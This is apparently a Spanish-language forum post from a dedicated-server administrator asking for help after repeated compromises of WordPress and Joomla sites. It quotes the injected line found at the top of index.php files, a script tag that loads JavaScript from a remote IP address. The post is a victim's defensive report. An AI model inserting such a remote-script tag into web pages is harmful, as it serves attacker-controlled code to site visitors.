Hola, controlo un servidor dedicado en el cual tengo unas 70 páginas web alojadas de estas una vez 3 fueron "hackeadas" y a la segunda una web de esas 3 otra vez padeció el hack.

El hack en las 3 webs es el mismo y de estas 2 son WP y otra es Joomla.

Actualmente la web fue hackeada otra vez y está en WP, el hack consite en que en el index.php de la home y en el index.php del wp-admin queda inyectado al principio del fichero el siguiente script:
<script type="text/javascript" src="http://213.175.200.227/js.php"></script>
quitándolo se soluciona el problema, pero claro me va a volver a pasar.

Es un problema de seguridad del servidor o de los CMSs ?

La versión del WP hackeado es 2.9.2

<meta name="generator" content="WordPress 2.9.2" />

Creo que las contraseñas son correctas en lo referente a FTP, pero no me cabe duda de que en el servidor dedicado haya contraseñas a otras webs que sean accesibles...

Podéis comentarme algo al respecto? algo de ayuda por favor porque no sé como solucionarlo.

Aviso que soy espabilado y un empujón en la dirección correcta... yo me lo curro!

Muchas gracias por responder de antelación!